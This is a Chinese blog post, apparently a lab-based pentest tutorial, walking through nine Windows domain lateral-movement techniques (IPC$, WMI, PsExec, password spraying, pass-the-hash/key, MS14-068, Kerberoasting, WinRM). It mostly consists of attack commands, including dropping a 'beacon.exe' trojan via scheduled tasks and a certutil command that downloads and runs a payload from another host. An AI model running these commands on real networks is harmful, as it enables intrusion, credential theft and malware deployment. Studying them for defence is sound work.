内网渗透-内网横向移动的九种方式

2024-04-15 14:28

本文主要是介绍内网渗透-内网横向移动的九种方式,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

内网横向移动的九种方式

文章目录
  • 内网横向移动的九种方式
  • 实验环境
  • 1.IPC横向
    • 1.1 利用条件
    • 1.2 命令
  • 2.WMI横向
    • 2.1利用条件
    • 2.2wmic
    • 2.3 cscript
    • 2.4 wmiexec
  • 3.smb横向
      • 3.1 利用条件
      • 3.2 psexec(微软官方工具)
      • 3.3 psexec(impacket工具)
      • 3.4 smbexec
    • 4.密码喷洒
      • 4.1利用metasploit进行密码喷洒
    • 5.PTH-哈希传递
      • 5.1 利用条件
      • 5.2 MiMiKatz-PTH
      • 6.PTK-mimiKatZ
      • 761 利用条件
    • 7.PtT-票据传递(ms14-068)
      • 7.1 利用条件
      • 7.2 利用步骤
    • 8.kerberoast攻击
      • 8.1 如何得到域中的SPN?
      • 8.2 请求服务票据
      • 8.3 导出票据
      • 8.4 破解服务票据:
    • 9.WinRM横向
      • 9.1 利用条件
      • 9.2 CMD执行
    • 10.相关资源

实验环境

1-4 所用环境如下:
在这里插入图片描述
5-9 所用环境如下:
在这里插入图片描述

1.IPC横向

IPC(Internet Process Connection)共享命名管道的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,使用139、445端口。

1.1 利用条件

1、目标机开启了139和445端口;

2、目标主机管理员开启了ipc$默认共享;

3、知道目标机的账户密码。

1.2 命令

建立IPC连接命令:
net use \191.168.52.136\ipc$ “password” /user:“Administrator”
断开连接:
net use \x.x.x.x\ipc$ /del
查看连接是否建立:
net use

在这里插入图片描述
建立IPC连接后可以使用计划任务执行木马上线。

拷贝木马:
copy beacon…exe \191.168.52.136\c$
创建计划任务(at<2012、schtasks>=2012):
at \191.168.52.136 15:47 c:\beacon.exe

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

2.WMI横向

WMI全称“windows管理规范”,从win2003开始一直存在。它原本的作用是方便管理员对windows主机进行管理。因此在内网渗透中,我们可以使用WMI进行横向移动。

2.1利用条件

1、WMI服务开启,端口135,默认开启。
2、防火墙允许135、445等端口通信。
3、知道目标机的账户密码。

2.2wmic

wmic /node:191.168.52.136 /user:xxxx /password:xxxxx process call create “cmd.exe /c ipconfig>d:\result.txt”
无需上传第三方软件,利用系统内置程序,单命令执行,执行后无结果回显

在这里插入图片描述

2.3 cscript

cscript //nologo wmiexec.vbs /shell 191.168.52.136

需上传wmiexec.vbs然后进入该服务器内进行执行在这里插入图片描述

2.4 wmiexec

1.执行命令:
python wmiexec.py ./:@192.168.52.136 “cmd.exe /c certutil -urlcache -split -f http://192.168.52.137:8090/wmi.exe C:\wmi.exe”
2.用hash的方式:
python wmiexec.py -hashes :36ec9d73422e1bf53b84fdb16a8e4198 ./qaxnb@192.168.52.136 “whoami”
第三方软件 (交互式&单执行),容易被杀

在这里插入图片描述
在这里插入图片描述

3.smb横向

利用SMB服务可以通过明文或hash传递来远程执行。

3.1 利用条件

1、445端口开放
2、知道账号密码

3.2 psexec(微软官方工具)

PsExec64.exe \192.168.52.136 -u -p -s cmd在这里插入图片描述

3.3 psexec(impacket工具)

python psexec.py -hashes :36ec9d73422e1bf53b84fdb16a8e4198 ./qaxnb@192.168.52.136
在这里插入图片描述

3.4 smbexec

python smbexec.py ./:@192.168.52.136
在这里插入图片描述

4.密码喷洒

4.1利用metasploit进行密码喷洒

msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set smbuser user.txt
msf6 exploit(windows/smb/psexec) > set smbpass password.txt
msf6 exploit(windows/smb/psexec) > set rhost 192.168.52.0/24
msf6 exploit(windows/smb/psexec) > run

在这里插入图片描述

5.PTH-哈希传递

PTH,即Pass The Hash,通过找到与账号相关的密码散列值(通常是NTLM Hash)来进行攻击。在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就可以使用哈希传递的方法登录到内网主机的其他计算机。

5.1 利用条件

1、在工作组环境中:
Windows Vista 之前的机器,可以使用本地管理员组内用户进行攻击。
Windows Vista 之后的机器,只能是administrator用户的哈希值才能进行哈希传递攻击,其他用户(包括管理员用户但是非administrator)也不能使用哈希传递攻击,会提示拒绝访问
2、在域环境中:
只能是域管理员组内用户(可以是域管理员组内非administrator用户)的哈希值才能进行哈希传递攻击,攻击成功后,可以访问域内任何一台机器
如果要用普通域管理员账号进行哈希传递攻击,则需要修改修改目标机器的 LocalAccountTokenFilterPolicy为1

5.2 MiMiKatz-PTH
  1. mimikatz privilege::debug

  2. mimikatz sekurlsa::pth /user:administrator /domain:goksec.org /ntlm:8a963371a63944419ec1adf687bb1be5

  3. steal_token PID

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

6.PTK-mimiKatZ

即Pass The Key ,当系统安装了KB2871997补丁且禁用了NTLM的时候,那我们抓取到的ntlm hash.也就失去了作用,但是可以通过pass the key的攻击方式获得权限。

761 利用条件

获取用户的aes key

mimikatz sekurlsa::ekeys
sekurlsa::pth /user:xxx /domain:xxx /aes256:xxxxxxxx"
成功后会返回一个cmd

在这里插入图片描述

7.PtT-票据传递(ms14-068)

7.1 利用条件

1.域控没有打MS14-068的补丁(KB3011780)
2.拿下一台加入域的计算机
3.有这台域内计算机的域用户密码和Sid
在这里插入图片描述

7.2 利用步骤

先清空当前机器的票据信息
mimikatz kerberos::list //列出当前票据
mimikatz kerberos::purge //清除票据
然后查看本机的sid
whoami /all
在这里插入图片描述

ms14-068生成tgt票据
ms14-068.exe -u lisi@goksec.org -p goksec@2021 -s S-1-5-21-1797401017-738776913-2751391128-1106 -d DC.goksec.org

在这里插入图片描述
导入票据
mimikatz kerberos::ptc <>
使用如下命令,可成功读取域控主机C盘目录下文件
shell dir \DC.goksec.org\c$在这里插入图片描述
在这里插入图片描述

8.kerberoast攻击

攻击者从 TGS-REP 中提取加密的服务票证。由于服务票证是用链接到请求 SPN 的帐户的哈希加密的,所以攻击者可以离线破解这个加密块,恢复帐户的明文密码。

8.1 如何得到域中的SPN?
  1. setspn -q /
  2. cscript GetUserSPNs.vbs

在这里插入图片描述

8.2 请求服务票据

mimikatz kerberos::ask /target:<HOST/OWA>

在这里插入图片描述

8.3 导出票据

mimikatz kerberos::list /export
在这里插入图片描述

8.4 破解服务票据:

python3 tgsrepcrack.py password.txt xxxx.kirbi在这里插入图片描述

9.WinRM横向

WinRM代表Windows远程管理,是一种允许管理员远程执行系统管理任务的服务。默认情况下支持Kerberos和NTLM身份验证以及基本身份验证。

9.1 利用条件

1、在win 2012之后(包括win 2012)的版本是默认开启的,win 2012之前利用需要手动开启winRM。

2、防火墙对5986、5985端口开放。
在这里插入图片描述

9.2 CMD执行

winrs -r:192.168.52.10 -u:192.168.52.10\用户名 -p:xxxxx “ipconfig”

获取交互式shell
winrs -r:192.168.52.10 -u:192.168.52.10\用户名 -p:xxxxx cmd

在这里插入图片描述

10.相关资源

https://www.freebuf.com/articles/system/174967.html

https://github.com/nidem/kerberoast

https://github.com/xan7r/kerberoast

https://github.com/SecureAuthCorp/impacket

https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

这篇关于内网渗透-内网横向移动的九种方式的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/906067

相关文章

gitlab安装及邮箱配置和常用使用方式

《gitlab安装及邮箱配置和常用使用方式》:本文主要介绍gitlab安装及邮箱配置和常用使用方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录1.安装GitLab2.配置GitLab邮件服务3.GitLab的账号注册邮箱验证及其分组4.gitlab分支和标签的

C++中零拷贝的多种实现方式

《C++中零拷贝的多种实现方式》本文主要介绍了C++中零拷贝的实现示例,旨在在减少数据在内存中的不必要复制,从而提高程序性能、降低内存使用并减少CPU消耗,零拷贝技术通过多种方式实现,下面就来了解一下... 目录一、C++中零拷贝技术的核心概念二、std::string_view 简介三、std::stri

Linux脚本(shell)的使用方式

《Linux脚本(shell)的使用方式》:本文主要介绍Linux脚本(shell)的使用方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录概述语法详解数学运算表达式Shell变量变量分类环境变量Shell内部变量自定义变量:定义、赋值自定义变量:引用、修改、删

python判断文件是否存在常用的几种方式

《python判断文件是否存在常用的几种方式》在Python中我们在读写文件之前,首先要做的事情就是判断文件是否存在,否则很容易发生错误的情况,:本文主要介绍python判断文件是否存在常用的几种... 目录1. 使用 os.path.exists()2. 使用 os.path.isfile()3. 使用

MySQL 横向衍生表(Lateral Derived Tables)的实现

《MySQL横向衍生表(LateralDerivedTables)的实现》横向衍生表适用于在需要通过子查询获取中间结果集的场景,相对于普通衍生表,横向衍生表可以引用在其之前出现过的表名,本文就来... 目录一、横向衍生表用法示例1.1 用法示例1.2 使用建议前面我们介绍过mysql中的衍生表(From子句

Mybatis的分页实现方式

《Mybatis的分页实现方式》MyBatis的分页实现方式主要有以下几种,每种方式适用于不同的场景,且在性能、灵活性和代码侵入性上有所差异,对Mybatis的分页实现方式感兴趣的朋友一起看看吧... 目录​1. 原生 SQL 分页(物理分页)​​2. RowBounds 分页(逻辑分页)​​3. Page

Linux链表操作方式

《Linux链表操作方式》:本文主要介绍Linux链表操作方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、链表基础概念与内核链表优势二、内核链表结构与宏解析三、内核链表的优点四、用户态链表示例五、双向循环链表在内核中的实现优势六、典型应用场景七、调试技巧与

Linux实现线程同步的多种方式汇总

《Linux实现线程同步的多种方式汇总》本文详细介绍了Linux下线程同步的多种方法,包括互斥锁、自旋锁、信号量以及它们的使用示例,通过这些同步机制,可以解决线程安全问题,防止资源竞争导致的错误,示例... 目录什么是线程同步?一、互斥锁(单人洗手间规则)适用场景:特点:二、条件变量(咖啡厅取餐系统)工作流

RedisTemplate默认序列化方式显示中文乱码的解决

《RedisTemplate默认序列化方式显示中文乱码的解决》本文主要介绍了SpringDataRedis默认使用JdkSerializationRedisSerializer导致数据乱码,文中通过示... 目录1. 问题原因2. 解决方案3. 配置类示例4. 配置说明5. 使用示例6. 验证存储结果7.

Python程序打包exe,单文件和多文件方式

《Python程序打包exe,单文件和多文件方式》:本文主要介绍Python程序打包exe,单文件和多文件方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录python 脚本打成exe文件安装Pyinstaller准备一个ico图标打包方式一(适用于文件较少的程